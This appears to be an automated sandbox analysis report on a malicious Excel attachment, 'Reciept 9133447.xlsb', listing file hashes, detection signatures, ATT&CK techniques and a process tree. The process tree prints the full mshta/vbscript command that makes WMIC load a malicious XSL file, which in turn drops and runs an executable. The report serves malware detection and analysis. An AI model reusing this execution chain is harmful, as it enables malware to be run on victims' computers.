Overview

overview

10

Static

static

8

Reciept 9133447.xlsb

windows7_x64

10

Reciept 9133447.xlsb

windows10_x64

9

Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-07-2021 15:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Reciept 9133447.xlsb

  • Size

    67KB

  • MD5

    c44c8e5c2b7ed4b597557bf12cc279c4

  • SHA1

    bf99994ffb3cd21635e1ef7f09e773e48068d3c1

  • SHA256

    e9157e32da346917b0092b432ede9945fa6d86ceccc07e0afa1e33826a3fecab

  • SHA512

    694058e46ac7b324e4df54e11ceba4ed92a40878f934f9369059905acc264d48c3ec888f52e7fb20e8931d62b0a22121efdf13167da8fe82b512d90ecdc77233

Score
9/10
cryptonepacker

Malware Config

Signatures

  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Reciept 9133447.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4432
  • \??\c:\windows\system32\mshta.EXE
    c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogOptionsCalculation.xsl"" & Chr(34)),0:close")
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Windows\System32\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogOptionsCalculation.xsl"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\Temp\98svw.exe
        "C:\Windows\Temp\98svw.exe"
        3⤵
        • Executes dropped EXE
        PID:2700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\qDialogOptionsCalculation.xsl
    MD5

    620bf55623214f88f930947072f5f85e

    SHA1

    e6d49a4bad59023d69653186a8193340d4b54adb

    SHA256

    144d5d7cc423e850a7ae9599fffeaed84e9ee5a882330f38a295381fe5263c7b

    SHA512

    87a8443c3477dcd3cc1a3ddfc1ce53031e1bcc82ee141946ef1da944c60207e22798efe625fef19cbd66a10f44972f3e2626166b9953f4b18608bbd3996e91e1

    Download Submit
  • C:\Windows\Temp\98svw.exe
    MD5

    9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

    SHA1

    d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

    SHA256

    b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

    SHA512

    c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    Download Submit
  • C:\Windows\Temp\98svw.exe
    MD5

    9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

    SHA1

    d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

    SHA256

    b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

    SHA512

    c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    Download Submit
  • memory/1704-179-0x0000000000000000-mapping.dmp
    Download
  • memory/2700-181-0x0000000000000000-mapping.dmp
    Download
  • memory/4432-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4432-121-0x00007FF9D4FA0000-0x00007FF9D608E000-memory.dmp
    Filesize

    16.9MB

    Download
  • memory/4432-123-0x00007FF9D30A0000-0x00007FF9D4F95000-memory.dmp
    Filesize

    31.0MB

    Download
  • memory/4432-122-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4432-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4432-114-0x00007FF6FCF40000-0x00007FF7004F6000-memory.dmp
    Filesize

    53.7MB

    Download
  • memory/4432-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4432-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

    Download